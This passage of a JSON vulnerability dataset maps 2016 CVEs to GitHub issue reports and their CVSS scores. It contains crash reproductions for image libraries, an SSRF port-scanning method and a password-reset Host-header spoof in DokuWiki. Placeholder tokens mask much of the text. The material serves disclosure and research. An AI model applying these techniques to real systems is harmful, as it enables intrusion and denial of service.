  3466. "description": "imagemagick mogrify global buffer overflow. Hi, the following test case will reproduce this crash. It's attached, you need a ASAN build on master branch > \u279c utilities git:(master) \u2717 ./magick mogrify PATHTAG > APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG a NUMBERTAG fc at pc NUMBERTAG c9ba bp NUMBERTAG ffdffbaac NUMBERTAG sp NUMBERTAG ffdffbaac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG fc thread T NUMBERTAG c9b9 ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG bed NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff1c7f ( PATHTAG NUMBERTAG f8cead ( PATHTAG NUMBERTAG f5da9 ( PATHTAG NUMBERTAG f NUMBERTAG a6b NUMBERTAG f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG fc is located NUMBERTAG bytes to the left of global variable 'format_bytes' defined in APITAG NUMBERTAG a NUMBERTAG of size NUMBERTAG a NUMBERTAG fc is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in APITAG NUMBERTAG a NUMBERTAG c0) of size NUMBERTAG string literal>' is ascii string APITAG > SUMMARY: APITAG global buffer overflow ( PATHTAG ) > Shadow bytes around the buggy address NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 FILETAG",
  3467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3468. "severity": "MEDIUM",
  3469. "baseScore": 6.5,
  3470. "impactScore": 3.6,
  3471. "exploitabilityScore": 2.8
  3472. },
  3473. {
  3474. "CVE_ID": "CVE-2016-7835",
  3475. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1144",
  3476. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1144",
  3477. "Repo_new": "h2o/h2o",
  3478. "Issue_Created_At": "2016-12-20T06:16:27Z",
  3479. "description": "_.",
  3480. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  3481. "severity": "CRITICAL",
  3482. "baseScore": 9.1,
  3483. "impactScore": 5.2,
  3484. "exploitabilityScore": 3.9
  3485. },
  3486. {
  3487. "CVE_ID": "CVE-2016-7906",
  3488. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/281",
  3489. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/281",
  3490. "Repo_new": "imagemagick/imagemagick",
  3491. "Issue_Created_At": "2016-09-30T10:20:54Z",
  3492. "description": "imagemagick mogrify heap use after free. Hi, the following test case will reproduce this crash. It's attached, you need a ASAN build on master branch > \u279c utilities git:(master) \u2717 ./magick mogrify PATHTAG > APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG cfeba bp NUMBERTAG ffdebb9ff NUMBERTAG sp NUMBERTAG ffdebb9ff NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG cfeb9 ( PATHTAG NUMBERTAG cf ( PATHTAG NUMBERTAG bfcfc ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff1c7f ( PATHTAG NUMBERTAG f8cead ( PATHTAG NUMBERTAG f5da9 ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG e NUMBERTAG f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  3493. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3494. "severity": "MEDIUM",
  3495. "baseScore": 5.5,
  3496. "impactScore": 3.6,
  3497. "exploitabilityScore": 1.8
  3498. },
  3499. {
  3500. "CVE_ID": "CVE-2016-7954",
  3501. "Issue_Url_old": "https://github.com/bundler/bundler/issues/5062",
  3502. "Issue_Url_new": "https://github.com/rubygems/rubygems/issues/3374",
  3503. "Repo_new": "rubygems/rubygems",
  3504. "Issue_Created_At": "2016-10-06T22:07:52Z",
  3505. "description": "Clarify documentation around global sources. As demonstrated by this blog post URLTAG , there is still a lot of end user confusion about how to deal with the source issues originally revealed in URLTAG A lot of that confusion is likely our fault as a team\u2014we often weren't sure what was and wasn't possible even as we were trying to fix the problem. As the above linked blog post mentions, the only way to be NUMBERTAG safe in Bundler NUMBERTAG is to have no global sources. The cross source confusion is eliminated in the (as yet unreleased) Bundler NUMBERTAG series by a series of backwards compatibility breaking changes to the format of the APITAG file and the way that Bundler handles gem sources internally. Once Bundler NUMBERTAG is out, you'll be able to use one global source and additional non global sources without worrying about any name conflicts. As a result of these problems, let's try to make it clearer for users what they need to do: FILETAG with clearer instructions around the possible problem and ways to avoid it ] Update the discussion of multiple sources in the Bundler docs to point out that this opens the possibility of name conflicts, and suggest using no global sources in Bundler NUMBERTAG Gemfiles. [ ] Update the existing warnings as needed to reflect the problems discussed in [the new blog post URLTAG This is a good chance for anyone to contribute, even if they aren't familiar with the Bundler code, since the explanations and warnings have all already been written down at least once. \ud83d\udc4d",
  3506. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3507. "severity": "CRITICAL",
  3508. "baseScore": 9.8,
  3509. "impactScore": 5.9,
  3510. "exploitabilityScore": 3.9
  3511. },
  3512. {
  3513. "CVE_ID": "CVE-2016-7954",
  3514. "Issue_Url_old": "https://github.com/bundler/bundler/issues/5051",
  3515. "Issue_Url_new": "https://github.com/rubygems/bundler/issues/5051",
  3516. "Repo_new": "rubygems/bundler",
  3517. "Issue_Created_At": "2016-10-05T02:08:29Z",
  3518. "description": "CVETAG secondary sources. Hi, I'm just wondering where the code is at re this vulnerability? Is there a fix? URLTAG Apologies if I missed the answer to this q elsewhere. Thanks, ben",
  3519. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3520. "severity": "CRITICAL",
  3521. "baseScore": 9.8,
  3522. "impactScore": 5.9,
  3523. "exploitabilityScore": 3.9
  3524. },
  3525. {
  3526. "CVE_ID": "CVE-2016-7964",
  3527. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/1708",
  3528. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/1708",
  3529. "Repo_new": "dokuwiki/dokuwiki",
  3530. "Issue_Created_At": "2016-10-03T16:13:46Z",
  3531. "description": "SSRF vulnerability in Dokuwiki. Hi, I found a ssrf vulnerability in dokuwiki. The APITAG method in APITAG Class(In file: APITAG has no restrict to access private network, such as NUMBERTAG APITAG APITAG This allows user to scan port of internal network. For example NUMBERTAG edit any page in dokuwiki NUMBERTAG Input APITAG NUMBERTAG Hit preview And the server will send a request to APITAG we can detect the port is open or not according to the response time. Hongkun Zeng hongkun. EMAILTAG .cn",
  3532. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  3533. "severity": "HIGH",
  3534. "baseScore": 8.6,
  3535. "impactScore": 4.0,
  3536. "exploitabilityScore": 3.9
  3537. },
  3538. {
  3539. "CVE_ID": "CVE-2016-7965",
  3540. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/1709",
  3541. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/1709",
  3542. "Repo_new": "dokuwiki/dokuwiki",
  3543. "Issue_Created_At": "2016-10-03T16:14:43Z",
  3544. "description": "Password Reset Address Spoof Vulnerability in APITAG Hi, This is the another vulnerability i found in APITAG APITAG use $_SERVER[HTTP_HOST] to be a part of the password reset address. This can lead to phishing attacks because of the modification of the site's links. (A remote unauthenticated attacker can chenge the host in reset password address.) The vulnerability can be triggered only if the Host header is not part of the web server routing process (e.g. if several domains are served by the same web server). Vulnerable file FILETAG , and the APITAG method use $_SERVER[HTTP_HOST] to be a part of the URL. Solution: Use the variable $_SERVER[SERVER_NAME] instead of the variable $_SERVER[HTTP_HOST] given that the server name is correctly defined or use an application specific constant. Hongkun Zeng hongkun. EMAILTAG .cn",
  3545. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  3546. "severity": "MEDIUM",
  3547. "baseScore": 6.5,
  3548. "impactScore": 3.6,
  3549. "exploitabilityScore": 2.8
  3550. },
  3551. {
  3552. "CVE_ID": "CVE-2016-8568",
  3553. "Issue_Url_old": "https://github.com/libgit2/libgit2/issues/3936",
  3554. "Issue_Url_new": "https://github.com/libgit2/libgit2/issues/3936",
  3555. "Repo_new": "libgit2/libgit2",
  3556. "Issue_Created_At": "2016-09-25T20:41:14Z",
  3557. "description": "Read out of bounds in git_oid_nfmt. Hi, We found a read out of bounds parsing a malformed object file using the last version of libgit2. To reproduce, first compile libgit2 and its examples with APITAG support. Then: $ git init ; mkdir p PATHTAG ; printf APITAG | base NUMBERTAG d > PATHTAG Finally, you can trigger the bug using cat file: $ ASAN_OPTIONS='detect_leaks NUMBERTAG cat file p APITAG The APITAG report is here: ERRORTAG This issues was found using APITAG Regards,",
  3558. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3559. "severity": "MEDIUM",
  3560. "baseScore": 5.5,
  3561. "impactScore": 3.6,
  3562. "exploitabilityScore": 1.8
  3563. },
  3564. {
  3565. "CVE_ID": "CVE-2016-8569",
  3566. "Issue_Url_old": "https://github.com/libgit2/libgit2/issues/3937",
  3567. "Issue_Url_new": "https://github.com/libgit2/libgit2/issues/3937",
  3568. "Repo_new": "libgit2/libgit2",
  3569. "Issue_Created_At": "2016-09-26T01:19:42Z",
  3570. "description": "APITAG using a null pointer derreference in git_commit_message. Hi, We found a null pointer derreference showing a malformed object file using the last version of libgit2. To reproduce, first compile libgit2 and its examples with APITAG support. Then: $ git init ; mkdir p PATHTAG ; printf PATHTAG | base NUMBERTAG d > PATHTAG Finally, you can trigger the bug using cat file: $ ASAN_OPTIONS='detect_leaks NUMBERTAG cat file p APITAG The APITAG report is here: ERRORTAG This issues was found using APITAG Regards",
  3571. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3572. "severity": "MEDIUM",
  3573. "baseScore": 5.5,
  3574. "impactScore": 3.6,
  3575. "exploitabilityScore": 1.8
  3576. },
  3577. {
  3578. "CVE_ID": "CVE-2016-8579",
  3579. "Issue_Url_old": "https://github.com/appc/docker2aci/issues/203",
  3580. "Issue_Url_new": "https://github.com/appc/docker2aci/issues/203",
  3581. "Repo_new": "appc/docker2aci",
  3582. "Issue_Created_At": "2016-09-30T12:40:33Z",
  3583. "description": "Infinite loop vulnerability in retrieving images chain. > Hi, > In code reviewing, i found an infinite loop vulnerability in retrieving images chain using docker2aci, it occurs during the corresponding json file parsing from user's image archive, fetching the parent image ID until ID is nil. There must be a possibility that the images chain may be a closed cycle, thus , docker2aci will fall into an infinite loop, that's indeed true by some interesting tests. > I think the core cause of this issue is lacking in essential check for duplicated image ID, such as the current image ID could not be equal to its parent image ID, most important, check whether the images chain is a closed cycle. > I processed some interesting test for this issue, building a crafted image whose top layer's parent ID points to itself, then an infinite loop occurred, this flaw caused excessive CPU cycles & resources consume on the host. > expecting subsequent discuss and fix the issue together, and could you request a CVE identifier for that ?",
  3584. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  3585. "severity": "MEDIUM",
  3586. "baseScore": 4.0,
  3587. "impactScore": 1.4,
  3588. "exploitabilityScore": 2.5
  3589. },
  3590. {
  3591. "CVE_ID": "CVE-2016-8600",
  3592. "Issue_Url_old": "https://github.com/dotCMS/core/issues/9330",
  3593. "Issue_Url_new": "https://github.com/dotcms/core/issues/9330",
  3594. "Repo_new": "dotcms/core",
  3595. "Issue_Created_At": "2016-07-06T19:49:07Z",
  3596. "description": "Captcha can be programmatically reused by passing session id. If you use a captcha protected resource like the APITAG you can pass the same captcha again and again via curl if you use the session id cookie of the original request. Once the captcha has been checked and validated, we need to remove it from the user's session programmatically.",
  3597. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  3598. "severity": "HIGH",
  3599. "baseScore": 7.5,
  3600. "impactScore": 3.6,
  3601. "exploitabilityScore": 3.9
  3602. },
  3603. {
  3604. "CVE_ID": "CVE-2016-8614",
  3605. "Issue_Url_old": "https://github.com/ansible/ansible-modules-core/issues/5237",
  3606. "Issue_Url_new": "https://github.com/ansible/ansible-modules-core/issues/5237",
  3607. "Repo_new": "ansible/ansible-modules-core",
  3608. "Issue_Created_At": "2016-10-12T13:54:58Z",
  3609. "description": "security] apt_key module does not verify key fingerprints. ISSUE TYPE Bug Report COMPONENT NAME apt_key module ANSIBLE VERSION devel CONFIGURATION not relevant OS / ENVIRONMENT not relevant SUMMARY apt_key module does not verify key fingerprints and imports keys based on NUMBERTAG digits long id. This is a serious problem because it is easy to generate a APITAG key with a desired NUMBERTAG digit key IDs. Also, hkp is unauthenticated so it it becomes trivial to offer a wrong key to a victim. The problem is [this workaround URLTAG . STEPS TO REPRODUCE yaml name: Try to import key without verifying that we import the correct key hosts: APITAG become: True tasks: apt_key: id: APITAG keyserver: 'hkp://pool.sks APITAG EXPECTED RESULTS That key does not exist. No key is added. ACTUAL RESULTS The key id NUMBERTAG BC NUMBERTAG B is imported. EXAMPLE FIX Enforce correct key fingerprint with a trick such as: CODETAG",
  3610. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  3611. "severity": "HIGH",
  3612. "baseScore": 7.5,
  3613. "impactScore": 3.6,
  3614. "exploitabilityScore": 3.9
  3615. },
  3616. {
  3617. "CVE_ID": "CVE-2016-8654",
  3618. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/94",
  3619. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/94",
  3620. "Repo_new": "jasper-software/jasper",
  3621. "Issue_Created_At": "2016-11-25T18:06:13Z",
  3622. "description": "jasper NUMBERTAG Heap Buffer Overflow vulnerabilities due to some programming mistake (different from NUMBERTAG overview Different from NUMBERTAG The vulnerability is found in jasper NUMBERTAG and is a Heap Buffer Overflow vulnerabilities. The vulnerability exists in code responsible for decoding the input image to a JP2 file. The vulnerability is a Heap Buffer Overflow vulnerability which can cause Out of Bound write due to a programming mistake (i.e. a mistake when setting the size of a memory allocation). The vulnerability can cause Denial of Service and may cause Remote Code Execution. Analysis and APITAG The detail analysis report and APITAG file can be found in the attachment. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: Bingchang, Liu @ VARAS of IIE email: l.bingchang. EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
  3623. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3624. "severity": "HIGH",
  3625. "baseScore": 7.8,
  3626. "impactScore": 5.9,
  3627. "exploitabilityScore": 1.8
  3628. },
  3629. {
  3630. "CVE_ID": "CVE-2016-8654",
  3631. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/93",
  3632. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/93",
  3633. "Repo_new": "jasper-software/jasper",
  3634. "Issue_Created_At": "2016-11-25T17:57:27Z",
  3635. "description": "jasper NUMBERTAG Heap Buffer Overflow vulnerabilities due to some programming mistake. Overview I have found a Heap Buffer Overflow vulnerability in jasper NUMBERTAG The vulnerability exists in code responsible for decoding the input image to a JP2 file. The vulnerability is a Heap Buffer Overflow vulnerability which can cause Out of Bound write due to a programming mistake (i.e. a mistake when setting the size of a memory allocation). The vulnerability can cause Denial of Service and may cause Remote Code Execution. Analysis and Poc The detail analysis report and APITAG file can be found in the attachmen. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: Bingchang, Liu @ VARAS of IIE email: l.bingchang. EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
  3636. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3637. "severity": "HIGH",
  3638. "baseScore": 7.8,
  3639. "impactScore": 5.9,
  3640. "exploitabilityScore": 1.8
  3641. },
  3642. {
  3643. "CVE_ID": "CVE-2016-8659",
  3644. "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/107",
  3645. "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/107",
  3646. "Repo_new": "containers/bubblewrap",
  3647. "Issue_Created_At": "2016-10-13T09:36:29Z",
  3648. "description": "privilege escalation via ptrace ( CVETAG ). Sebastian Krahmer reported this to the oss security mailing list URLTAG . I have not analyzed whether this is a practical vulnerability or whether it is based on some faulty assumption. ERRORTAG",
  3649. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  3650. "severity": "HIGH",
  3651. "baseScore": 7.0,
  3652. "impactScore": 5.9,
  3653. "exploitabilityScore": 1.0
  3654. },
  3655. {
  3656. "CVE_ID": "CVE-2016-8677",
  3657. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/268",
  3658. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/268",
  3659. "Repo_new": "imagemagick/imagemagick",
  3660. "Issue_Created_At": "2016-09-14T13:44:14Z",
  3661. "description": "memory allocation failure in APITAG (quantum.c). A crafted image causes a memory allocation failure. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG",
  3662. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3663. "severity": "HIGH",
  3664. "baseScore": 8.8,
  3665. "impactScore": 5.9,
  3666. "exploitabilityScore": 2.8
  3667. },
  3668. {
  3669. "CVE_ID": "CVE-2016-8678",
  3670. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/272",
  3671. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/272",
  3672. "Repo_new": "imagemagick/imagemagick",
  3673. "Issue_Created_At": "2016-09-14T13:56:59Z",
  3674. "description": "heap based buffer overflow in APITAG (pixel accessor.h). A crafted image causes an heap overflow. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG FILETAG",
  3675. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3676. "severity": "MEDIUM",
  3677. "baseScore": 5.5,
  3678. "impactScore": 3.6,
  3679. "exploitabilityScore": 1.8
  3680. },
  3681. {
  3682. "CVE_ID": "CVE-2016-8862",
  3683. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/271",
  3684. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/271",
  3685. "Repo_new": "imagemagick/imagemagick",
  3686. "Issue_Created_At": "2016-09-14T13:55:47Z",
  3687. "description": "memory allocation failure in APITAG (memory.c) different from NUMBERTAG A crafted image causes a memory allocation failure. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG FILETAG",
  3688. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3689. "severity": "HIGH",
  3690. "baseScore": 8.8,
  3691. "impactScore": 5.9,
  3692. "exploitabilityScore": 2.8
  3693. },
  3694. {
  3695. "CVE_ID": "CVE-2016-8882",
  3696. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/30",
  3697. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/30",
  3698. "Repo_new": "jasper-software/jasper",
  3699. "Issue_Created_At": "2016-10-16T22:51:00Z",
  3700. "description": "segfault / null pointer access in jpc_pi_destroy. The attached file will crash jasper (can be tested with imginfo) with a null pointer access. It was found with american fuzzy lop. FILETAG Stack trace from address sanitizer NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG f bp NUMBERTAG fc8 sp NUMBERTAG fffa1dea NUMBERTAG T NUMBERTAG f NUMBERTAG e in jpc_pi_destroy PATHTAG NUMBERTAG f NUMBERTAG f in jpc_dec_tilefini PATHTAG NUMBERTAG bd in jpc_dec_process_eoc PATHTAG NUMBERTAG fb4 in jpc_dec_decode PATHTAG NUMBERTAG fb4 in jpc_decode PATHTAG NUMBERTAG f NUMBERTAG in jas_image_decode PATHTAG NUMBERTAG f NUMBERTAG cf in main PATHTAG NUMBERTAG f2ac NUMBERTAG f in __libc_start_main APITAG NUMBERTAG d8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in jpc_pi_destroy NUMBERTAG ABORTING",
  3701. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3702. "severity": "MEDIUM",
  3703. "baseScore": 5.5,
  3704. "impactScore": 3.6,
  3705. "exploitabilityScore": 1.8
  3706. },
  3707. {
  3708. "CVE_ID": "CVE-2016-8883",
  3709. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/32",
  3710. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/32",
  3711. "Repo_new": "jasper-software/jasper",
  3712. "Issue_Created_At": "2016-10-16T23:00:10Z",
  3713. "description": "assert in APITAG The attached file causes an assert in the function jpc_dec_tiledecode. Found with american fuzzy lop. FILETAG Error message: imginfo: APITAG int jpc_dec_tiledecode(jpc_dec_t , jpc_dec_tile_t ): Assertion `dec >numcomps NUMBERTAG failed.",
  3714. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3715. "severity": "MEDIUM",
  3716. "baseScore": 5.5,
  3717. "impactScore": 3.6,
  3718. "exploitabilityScore": 1.8
  3719. },
  3720. {
  3721. "CVE_ID": "CVE-2016-9112",
  3722. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/855",
  3723. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/855",
  3724. "Repo_new": "uclouvain/openjpeg",
  3725. "Issue_Created_At": "2016-10-27T12:26:55Z",
  3726. "description": "APITAG Point Exception) in PATHTAG Vulnerability openjpeg FPE in pi.c NUMBERTAG ersion openjpeg NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG b NUMBERTAG d NUMBERTAG f (pc NUMBERTAG b NUMBERTAG d NUMBERTAG f bp NUMBERTAG bfcb NUMBERTAG c8 sp NUMBERTAG bfcb NUMBERTAG T NUMBERTAG b NUMBERTAG d NUMBERTAG e ( PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bbd NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bbb NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e2bf ( PATHTAG NUMBERTAG b NUMBERTAG a2d6 ( PATHTAG NUMBERTAG b NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG d ( PATHTAG NUMBERTAG b NUMBERTAG ab5a ( PATHTAG NUMBERTAG f7 ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG FPE ( PATHTAG ) GDB information Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb NUMBERTAG ed in opj_pi_next_cprl (pi NUMBERTAG dfb8) at PATHTAG NUMBERTAG if (!((pi >y % (OPJ_INT NUMBERTAG comp >dy APITAG y == pi >ty0) && ((try0 APITAG dy NUMBERTAG gdb) p rpy NUMBERTAG gdb) p comp >dy <<< rpy A syntax error in expression, near `< rpy'. (gdb) p comp >dy APITAG dy APITAG dy << rpy). Poc Contact me if you need Poc file at EMAILTAG",
  3727. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3728. "severity": "HIGH",
  3729. "baseScore": 7.5,
  3730. "impactScore": 3.6,
  3731. "exploitabilityScore": 3.9
  3732. },
  3733. {
  3734. "CVE_ID": "CVE-2016-9113",
  3735. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/856",
  3736. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/856",
  3737. "Repo_new": "uclouvain/openjpeg",
  3738. "Issue_Created_At": "2016-10-29T03:21:27Z",
  3739. "description": "NULL point derefence in function imagetobmp of convertbmp.c. DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG f NUMBERTAG pc NUMBERTAG cc0 bp NUMBERTAG bfad5d NUMBERTAG sp NUMBERTAG bfad5cc0 T NUMBERTAG cbf ( PATHTAG NUMBERTAG b8 ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Program received signal SIGSEGV, Segmentation fault NUMBERTAG b NUMBERTAG in imagetobmp (image NUMBERTAG b NUMBERTAG c0, outfile NUMBERTAG bfa3efd4 APITAG at PATHTAG NUMBERTAG r = image APITAG h ((i) / (w NUMBERTAG w + (i) % (w)]; (rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG Analysis step1: p_image_dest APITAG = NULL APITAG step2: opj_j2k_exec (p_j2k,p_j2k APITAG APITAG > APITAG > APITAG p_j2k APITAG NUMBERTAG p_go_on NUMBERTAG l_go_on NUMBERTAG step3: APITAG the program accesses image APITAG However data is still NULL Poc Contact me if you need Poc file at EMAILTAG",
  3740. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3741. "severity": "HIGH",
  3742. "baseScore": 7.5,
  3743. "impactScore": 3.6,
  3744. "exploitabilityScore": 3.9
  3745. },
  3746. {
  3747. "CVE_ID": "CVE-2016-9114",
  3748. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/857",
  3749. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/857",
  3750. "Repo_new": "uclouvain/openjpeg",
  3751. "Issue_Created_At": "2016-10-29T08:19:23Z",
  3752. "description": "NULL Pointer Access in function imagetopnm of APITAG DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG eaf bp NUMBERTAG bfc NUMBERTAG a8 sp NUMBERTAG bfc NUMBERTAG T NUMBERTAG eae ( PATHTAG NUMBERTAG c ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Breakpoint NUMBERTAG imagetopnm (image NUMBERTAG d2d5c0, outfile NUMBERTAG bfb NUMBERTAG APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red = image APITAG (rr) p red NUMBERTAG int NUMBERTAG bfb NUMBERTAG rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG rr) c Continuing. Program received signal SIGSEGV, Segmentation fault NUMBERTAG b NUMBERTAG in imagetopnm (image NUMBERTAG d2d5c0, outfile NUMBERTAG bfb NUMBERTAG APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red + APITAG ++red; Analysis image APITAG = NULL and it was assigned to red, so the program accesses to red, segment fault occurs. Poc Contact me if you need Poc file at EMAILTAG",
  3753. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3754. "severity": "HIGH",
  3755. "baseScore": 7.5,
  3756. "impactScore": 3.6,
  3757. "exploitabilityScore": 3.9
  3758. },
  3759. {
  3760. "CVE_ID": "CVE-2016-9115",
  3761. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/858",
  3762. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/858",
  3763. "Repo_new": "uclouvain/openjpeg",
  3764. "Issue_Created_At": "2016-10-29T08:45:59Z",
